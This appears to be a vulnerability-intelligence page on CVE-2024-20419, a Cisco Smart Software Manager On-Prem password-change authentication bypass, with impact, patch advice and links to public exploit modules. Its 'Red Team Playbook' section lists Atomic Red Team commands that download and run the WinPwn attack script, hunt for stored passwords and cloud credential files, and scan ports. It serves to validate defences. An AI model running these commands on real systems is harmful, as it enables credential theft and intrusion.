CVE-2024-20419
Overview
This vulnerability is an authentication bypass caused by improper implementation of the password-change process in Cisco Smart Software Manager On-Prem. The flaw resides in the handling of HTTP requests that allow password changes without verifying the identity of the requester. The affected component is the authentication system within the web UI and API of the Cisco Smart Software Manager On-Prem product.
Vulnerability Description
A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
Impact
An attacker with network access can exploit this vulnerability without any authentication or user interaction to change passwords of arbitrary users, including administrators. This enables the attacker to gain privileged access to the affected system’s web UI and API, potentially leading to full system compromise, data exposure, and control over license management. The CVSS vector indicates high impact on confidentiality, integrity, and availability (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Solution
Cisco has released a security advisory (cisco-sa-cssm-auth-sLw3uhUy) detailing patches for Cisco Smart Software Manager On-Prem to address this authentication bypass vulnerability. Users should apply the vendor-provided updates promptly to affected versions as specified in the advisory. No workarounds are documented; refer to Cisco's official advisory for exact patch versions and installation instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the authentication system of Cisco Smart Software Manager On-Prem stems from an improper implementation of the password-change process. This flaw allows an unauthenticated remote attacker to manipulate user credentials, including those of administrative users, by sending specially crafted HTTP requests to the affected system. The lack of adequate validation and authentication checks during the password change process creates a significant security gap, enabling unauthorized access to sensitive functionalities of the software. This vulnerability highlights the critical importance of robust authentication mechanisms and secure coding practices in web applications.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate the process by targeting the web interface or API of the Cisco Smart Software Manager On-Prem. By crafting specific HTTP requests that bypass authentication checks, the attacker could change the password of any user account, thus gaining access to the system with the privileges of that user. This could lead to further exploitation, such as data exfiltration, unauthorized configuration changes, or even the deployment of malicious software within the network. The simplicity of the attack, combined with the high impact potential, makes this vulnerability particularly concerning for organizations relying on this software for managing their Cisco devices.
The real-world impact of this vulnerability is profound, especially for organizations that utilize Cisco Smart Software Manager On-Prem for critical operations. A successful exploit could lead to unauthorized access to sensitive data, disruption of services, and potential compliance violations, particularly for organizations subject to regulatory frameworks such as GDPR or HIPAA. The business risks associated with such an incident include financial losses, reputational damage, and the costs associated with incident response and recovery efforts. Furthermore, the high CVSS score indicates that the vulnerability poses a severe threat, making it imperative for organizations to prioritize its remediation.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing can help identify potential weaknesses in the authentication mechanisms of the software. Additionally, monitoring network traffic for unusual patterns, such as unauthorized password change requests, can provide early warnings of potential exploitation attempts. Organizations should also ensure that they are running the latest version of the Cisco Smart Software Manager On-Prem, as vendors typically release patches to address known vulnerabilities. Furthermore, enforcing strong password policies and multi-factor authentication can significantly reduce the risk of unauthorized access, even if an attacker attempts to exploit this vulnerability.
In conclusion, the vulnerability in the authentication system of Cisco Smart Software Manager On-Prem poses a critical threat to organizations that depend on this software for managing their Cisco devices. The potential for unauthorized access to user accounts, especially administrative ones, can lead to severe consequences, including data breaches and operational disruptions. Organizations must take proactive steps to detect and mitigate this vulnerability, ensuring that their security posture remains robust against such threats. By prioritizing security best practices and maintaining vigilance, organizations can better protect themselves from the risks associated with this and similar vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Smart Software Manager On-Prem | All |
cpe:2.3:a:cisco:smart_software_manager_on-prem:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)
auxiliary/admin/http/cisco_ssm_onprem_account
|
Michael Heinzl, Mohammed Adel | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover | Mohammed Adel | webapps | multiple | - | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-20419 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy |
| secpod.com |
GitHub CVE
|
https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/ |